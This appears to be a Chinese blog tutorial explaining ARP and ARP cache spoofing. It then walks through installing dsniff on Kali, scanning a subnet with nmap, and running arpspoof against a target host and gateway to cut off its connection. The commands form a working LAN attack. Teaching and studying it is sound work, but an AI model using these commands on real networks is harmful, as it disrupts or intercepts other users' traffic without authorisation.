网络空间安全
ARP欺骗
ARP欺骗

ARP欺骗

ARP欺骗

arpspoof下载(kali应用)

1.更新软件源

sudo apt-get update

这将更新kali linux上的软件包列表

2.安装dsniff软件包

sudo apt-get install dsniff

ARP

地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。

主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源

地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。

ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。

ARP欺骗

ARP是OSI七层模型中位于第二层数据链路层的协议,作用是将IP地址解析为MAC地址

设备中会有一个表叫做ARP缓存表

arp -a

fig:

arp表的缓存分为动态和静态。静态匹配不会随发送的arp请求变化,如果IP地址和Mac地址不匹配,设备不进行响应,必须手动修改arp表;动态匹配会因arp请求变动arp表,不需要手动修改。

但这会造成arp欺骗,攻击机用arpspoof发送大量arp包,将设备中的ip地址与自己的Mac地址匹配,设备发往目的机的包会发往攻击机。

arpspoof使用

1.查看自己所处网段

ifconfig

fig:

2.扫描自己网段内所有的设备

nmap 192.168.*.0-255

-sS -sT 可选命令

fig:

3.srpspoof进行断网攻击

arpspoof -i eth0 -t 192.168.101.49 -r 192.168.101.1

fig:

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注